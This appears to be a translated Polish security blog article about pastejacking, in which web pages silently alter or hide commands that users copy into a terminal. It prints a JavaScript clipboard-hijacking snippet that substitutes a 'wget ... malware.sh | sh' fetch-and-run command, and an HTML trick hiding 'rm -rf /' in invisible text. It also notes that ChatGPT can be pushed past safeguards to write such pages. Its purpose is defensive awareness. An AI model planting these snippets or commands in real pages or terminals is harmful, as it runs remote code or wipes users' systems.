Contents

Dlaczego nie należy kopiować i wklejać poleceń z Internetu?

Od komputerów po telefony komórkowe, kopiowanie i wklejanie jest powszechne wszędzie. Ułatwia życie i oszczędza czas, ponieważ nie trzeba wpisywać długich poleceń lub zbędnych tekstów. Jeśli jednak nie jesteś wystarczająco ostrożny, możesz zostać zhakowany, po prostu kopiując i wklejając polecenia w terminalu komputera.

Czy powinniśmy zagłębić się w badanie potencjalnych luk w zabezpieczeniach związanych z praktyką powielania i wstawiania tekstu, a także omówić środki ostrożności, które można zastosować w celu zabezpieczenia się przed takim ryzykiem?

Dlaczego nie należy kopiować i wklejać poleceń

Niezależnie od tego, czy ktoś jest niedoświadczonym użytkownikiem interfejsu wiersza poleceń, czy też biegłym praktykiem, nierzadko zdarza się, że osoby uciekają się do kopiowania i wklejania poleceń uzyskanych ze źródeł internetowych w celu przyspieszenia przepływu pracy i zwiększenia produktywności. Chociaż na pierwszy rzut oka podejście to może wydawać się skuteczne, ważne jest, aby zdać sobie sprawę, że niektóre złośliwe strony internetowe wykorzystały tę praktykę, osadzając szkodliwy kod w skopiowanych polach tekstowych, tym samym potajemnie wprowadzając złośliwe oprogramowanie do systemów niczego niepodejrzewających użytkowników, gdy niewinnie wklejają polecenia do swoich terminali.

W celu ukrycia złośliwych dyrektyw, te nikczemne osoby zastosowały szereg zwodniczych technik w swojej implementacji front-end, czyniąc pozornie nieszkodliwy kod fasadą dla ukrytych i szkodliwych działań.

Wykonanie polecenia “sudo apt-get update && apt-get upgrade” jest zwykle używane do aktualizacji repozytorium i uaktualnienia pakietów w systemie Linux. Ważne jest jednak, aby zachować ostrożność podczas korzystania z prefiksu “sudo”, ponieważ przyznaje on uprawnienia administracyjne, które mogą potencjalnie pozwolić na wykonanie złośliwego kodu bez świadomości użytkownika. Dlatego ważne jest, aby zweryfikować autentyczność wszelkich poleceń przed wprowadzeniem ich w terminalu.

W tragicznej sytuacji można sobie wyobrazić, że w konsekwencji może dojść do obalenia całego systemu lub ataku ransomware. Jednak jakie dokładnie są taktyki stosowane przez te złośliwe podmioty do wykonywania takich działań? W jaki sposób szkodliwe dyrektywy mogą być zakamuflowane w pozornie nieszkodliwym kodzie?

Jak działają exploity złośliwego kodu

/pl/images/poc-of-exploit.jpg

Atak ten może zostać przeprowadzony przy użyciu skomplikowanego kodu JavaScript lub nawet podstawowej składni HTML.Język JavaScript jest wyposażony w instrument znany jako “EventListener”, który umożliwia wykrywanie i obsługę różnych zdarzeń, które mogą wystąpić w przeglądarce internetowej, w tym między innymi kliknięcie przycisku, przesłanie formularza, przesunięcie kursora, wpisanie klawiszy lub dostosowanie rozmiaru rzutni.

EventListener służy jako podstawowe narzędzie umożliwiające aplikacjom internetowym odpowiednie reagowanie na określone zdarzenia zainicjowane działaniami użytkownika. Niestety, strony internetowe pozbawione skrupułów wykorzystują tę korzystną funkcjonalność, przechwytując przypadki, w których użytkownicy kopiują tekst, a następnie zastępując go szkodliwym kodem.

Podstawowy kod wykorzystany do utworzenia obrazu demonstracyjnego jest następujący:

 <script>
document.addEventListener('copy', function(event) {
  event.preventDefault();
  const copiedText = "wget http://localhost:8000/malware.sh | sh";
  event.clipboardData.setData('text/plain', copiedText);
});
</script>

Oto demonstracja wykorzystująca zwykły HTML bez konieczności używania jakiegokolwiek języka skryptowego, takiego jak JavaScript:

 <p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>

</p> 

Wykorzystanie niezauważalnej białej czcionki ukrywa złowrogie polecenie “rm -rf /”, podczas gdy zastosowanie elementu łamania linii HTML ( ) umożliwia niektórym terminalom automatyczne wykonanie treści po wklejeniu. Wbrew powszechnemu przekonaniu, do skutecznego przeprowadzenia takiego cyberataku nie jest wymagana zaawansowana biegłość w programowaniu lub tworzeniu stron internetowych; jest to raczej niezwykle proste do osiągnięcia.

Pomimo braku znajomości JavaScript lub tworzenia stron internetowych, nawet początkujący użytkownicy mogą wykorzystać ChatGPT do opracowania szkodliwego kodu. Dostarczając strategiczne dane wejściowe, osoby pozbawione skrupułów mogą wykorzystać luki w systemie, skutecznie naruszając jego zabezpieczenia i kierując go do generowania złośliwych stron internetowych wykorzystujących te słabości.

Jak możesz się chronić

/pl/images/blue-purple-coding.jpg

Chociaż nie ma niezawodnej metody ochrony przed atakami złośliwego kodu, można podjąć pewne środki ostrożności, takie jak zakaz wykonywania JavaScript na stronach internetowych, które są uważane za potencjalnie szkodliwe. Warto jednak zauważyć, że wiele nowoczesnych aplikacji internetowych wymaga JavaScript do prawidłowego działania, a zatem jego całkowite wyłączenie może utrudnić przeglądanie.

Ponadto podejście oparte na kaskadowych arkuszach stylów stanowi wyzwanie pod względem ochrony przed złośliwymi skryptami, ponieważ wykorzystywany jest legalny kod CSS, chociaż jego intencją pozostaje szkodliwość. Aby skutecznie się zabezpieczyć, najważniejsze jest przestrzeganie podstawowych praktyk higieny online i czujność.

Podczas korzystania z wiersza poleceń zaleca się zachowanie ostrożności podczas nawigacji po nieznanych lub podejrzanych linkach.Aby zmniejszyć potencjalne zagrożenia bezpieczeństwa, zaleca się, aby użytkownicy weryfikowali autentyczność wszelkich poleceń uzyskanych ze źródeł zewnętrznych, przeglądając je w aplikacji do edycji tekstu przed wykonaniem ich w środowisku terminala. Stosując się do godnych zaufania i ugruntowanych repozytoriów kodu, użytkownicy mogą zminimalizować prawdopodobieństwo wprowadzenia szkodliwego kodu do swojego systemu za pomocą niczego niepodejrzewających środków.

Co więcej, niektóre emulatory terminali, takie jak xfce4-terminal, są wyposażone we wbudowane środki bezpieczeństwa, aby zapobiec nieautoryzowanemu kopiowaniu i wklejaniu poleceń. Ta funkcja wyświetla powiadomienie, które określa konkretne działania, które zostaną wykonane po wklejeniu polecenia w terminalu. Aby upewnić się, że twój terminal również posiada tę funkcję, sprawdź jej dostępność i odpowiednio ją włącz.

Wykonanie złośliwego kodu jest wysoce niebezpieczne

Nawet z zainstalowanym programem antywirusowym, niektóre rodzaje szkodliwego oprogramowania mogą nadal łamać zabezpieczenia urządzenia. W związku z tym należy zachować ostrożność podczas pobierania lub kopiowania jakiegokolwiek kodu z Internetu i podjąć niezbędne środki ostrożności w celu ochrony przed potencjalnymi zagrożeniami.